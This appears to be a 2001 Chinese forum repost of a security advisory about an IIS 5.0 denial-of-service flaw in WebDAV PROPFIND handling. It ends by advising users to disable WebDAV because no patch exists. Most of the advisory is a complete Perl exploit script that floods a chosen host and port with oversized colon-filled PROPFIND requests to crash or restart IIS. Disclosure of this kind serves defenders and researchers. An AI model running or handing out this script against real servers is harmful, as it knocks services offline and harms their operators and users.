发信人: xmzw(小米粥)
整理人: williamlong(2001-05-18 12:16:14), 站内信件
|
整理编辑:China ASP
涉及程序:
IIS
描述:
提交特殊构造的 PROPFIND 请求导致 IIS 5.0 拒绝服务漏洞
详细:
近日发现 IIS5.0 存在拒绝服务漏洞。远程攻击者提交特殊构造的 PROPFIND 请求能重启 IIS 相关服务;若持续地提交这种请求则能导致 IIS 产生拒绝服务漏洞。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
Basically the problem are very long but valid propfind request containing lots of ":".
Demonstration:
--vv9.pl-------------------------------------------------------------------
#!/usr/bin/perl
use IO::Socket;
printf "Written by Georgi Guninski wait some time\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0];
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") ||
return;
$over=":" x $ll ; # the ":" is the most important
$ch=pack("C",65); # just to check whether potentail payload is possible - yes
$tmp = $ch x 64;
$over= $ch x 4 . $over . $tmp;
$over1=":" x $ll; #not sure about this
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over1".':">';
$xml=$xml.'<a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1\.1\nContent-type: text/xml\nHost: $host\nContent-length:
$l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,200);
print $res;
close $socket;
}
do vv(59060);
#this is overflow, repeat several times - 49060 seems the smallest #, may need to change
sleep(1);
do vv(59060);
受影响系统:
IIS 5.0
解决方案:
微软尚未推出补丁,建议用户暂时禁止 WebDav extensions
|
|